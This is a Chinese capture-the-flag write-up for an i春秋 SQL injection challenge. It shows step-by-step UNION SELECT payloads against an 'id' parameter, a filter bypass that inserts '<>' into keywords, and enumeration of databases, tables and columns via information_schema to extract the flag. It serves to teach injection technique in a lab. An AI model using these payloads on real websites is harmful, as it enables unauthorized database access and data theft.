i春秋之SQL(详细WP)
解题目录
第一步:寻找注入点
第二步:确定注入类型
第三部:爆表
第四步: 查表
在看WP之前呢,有不懂的地方推荐查看下面的文章(挺详细的),还是需要些MySQL基础的
web 漏洞入门之 —— SQL 注入教程_实验楼-CSDN博客
第一步:寻找注入点
题目直接告诉我们了,这是道SQL注入题,打开连接,不难发现id应该就是注入点了
第二步:确定注入类型
用limit x 1或order by x,判断字段数 ,这里用order by
出现报错,应该是关键字被过滤掉了,这里尝试绕过了很久,发现好像只有<>能绕过了
可以看见,当x为4的时候,出现页面出现错误,说明该SQL查询语句的字段数为3,也就是说,该查询语句查询了3个列
第三部:爆表
利用基础的联合查询union select , 查看数据库信息
构造payload,先看看有回显的列
inurl?id=-1 unio<>n s<>elect 1,2,3
这里故意让id等于-1,是为了制造错误让语句不执行,防止影响到后面操作
回显了2说明,这个位置可以利用
构造paload,查询所有可用的数据库
inurl?id=-1 unio<>n s<>elect 1,table_schema,3 from information_schema.tables
可以看到只有两个数据库,当前使用的数据库应该就是sqli ,也可以用database()查看
database() 当前使用的数据库
构造payload,查询sqli数据库的所有表
inurl?id=-1 unio<>n s<>elect 1,group_concat(table_name),3 from information_schema.tables where table_schema='sqli'
继续查看表里面的所有列
inurl?id=-1 unio<>n s<>elect 1,group_concat(column_name),3 from information_schema.columns where table_name='info'
发现放flag的列名啦
第四步: 查表
构造payload,查看对应列名
inurl?id=-1 unio<>n s<>elect 1,group_concat(flAg_T5ZNdrm),3 from info
拿到flag
i春秋之SQL(详细WP)相关推荐
- 史上最详细sql注入wp
文章目录 sql注入wp(史上最详细) 前言 什么是SQL注入? SQL注入的原理 常见的注入方式 常见绕过技巧 常见防控SQL注入的方法 手工查询语句 Basic Challenges Less-1 ...
- i春秋 XSS闯关 wp
2021.1.16 又是菜鸡划水的一天. 最近看到了一个XSS题目,应该是i春秋这里刚上线的题,之前没有人做,这个属于<从0到1,CTFer成长之路>用来加深对XSS的理解最好不过了. 单 ...
- 【ctfshow】web篇-SQL注入 wp
前言 记录web的题目wp,慢慢变强,铸剑. SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "s ...
- sql分组查询group by结合count,sum统计语句的实现(附带sql详细分析步骤)
日常写代码经常会遇到数据统计的业务场景,分组查询 group by 结合 count 和 sum 的复杂语句写起来容易令人头大,在这里分享两个比较复杂的统计场景,提供详细分析思路和最终sql语句,希望 ...
- PL/SQL详细介绍
PL/SQL笔记 PL/SQL块中只能直接嵌入SELECT,DML(INSERT,UPDATE,DELETE)以及事务控制语句(COMMIT,ROLLBACK,SAVEPOINT),而不能直接嵌入DD ...
- DVWA sql注入 WP
sql注入基本思路: 1.源码 2.判断数字型和字符型 3.猜测字段数 4.查询数据库中的字段 5.查询表中的字段 6.查询user表中的字段 7.拿字段中数据 low: 1.源码: <?php ...
- 2021深育杯MISC超详细WP
login 示例-副本.txt是伪加密,解出后明文攻击 解密password.zip发现是六字符CRC32 得到密码 welc0me_sangforctf 解密.passwd.swp 家人们以后恢复s ...
- 2021-i春秋-春季赛逆向WP
2021-i春秋-春季赛 一:backdoor 参考了一些Go语言的Socket编程 https://www.cnblogs.com/yinzhengjie/p/7261584.html https: ...
- CTFShow-MISC入门篇详细wp(1-56)
CTFShow-MISC入门篇 图片篇(基础操作): misc1 misc2 misc3 misc4 图片篇(信息附加): misc5 misc6 misc7 misc8 misc9 misc10 m ...
最新文章
- 简单的Windows资源管理器——Java版本
- 通信原理-确知信号的最佳接收
- 青岛互联网java开发_为什么说Java是过去未来的互联网编程(上)
- 多元函数严格凹 海塞矩阵正定_海森矩阵的应用:多元函数极值的判定
- java 终结此段代码并重新运行_Java垃圾回收
- 【转】git hub 使用小结
- python如何获取请求的url_听说你在学习:如何通过代码请求URL地址
- DSS流媒体服务器搭建
- 对“车库咖啡的网络现状改造”的一点个人看法
- python random
- 如何让你的ASO优化效果提升10倍?
- 「 Luogu P2230 」X 「 Vijos 1142 」 HXOS系统
- 计算机考研数据结构参考书,2020考研计算机备考:数据结构参考书及重点
- secoclient在Mac下使用无法上网的解决办法
- 【矢量图】PyEcharts导出图片并矢量化
- cdLinux显示“没有发现无限网卡!”
- wpf研究之道-grid控件
- Java课程设计-画图工具
- phpstorm快速编辑模板技巧
- 大顶堆及小顶堆求最大或最小K个数
热门文章
- 通信专业应掌握的计算机软件,全国通信专业技术人员职业水平(中级)考试大纲...
- 域名可以过户吗?域名过户需要多久?
- 基于SAS对美国新冠数据的分析
- C++类中有如vector, map等容器类成员时如何编写构造函数
- 毕业设计 基于51单片机的电子秤设计(源码+硬件+论文)
- How much do you know in R language
- 刚做测试工作一年的时候,我是怎样的?
- MVP模式 项目练习 Pas --新闻 音乐 图片 三个模块
- Linux_Shell脚本 + 配置文件:按照不同文件类型合并文件,小文件合并成大文件
- 论文阅读《How Does Knowledge Graph Embedding Extrapolate to Unseen Data: A Semantic Evidence View》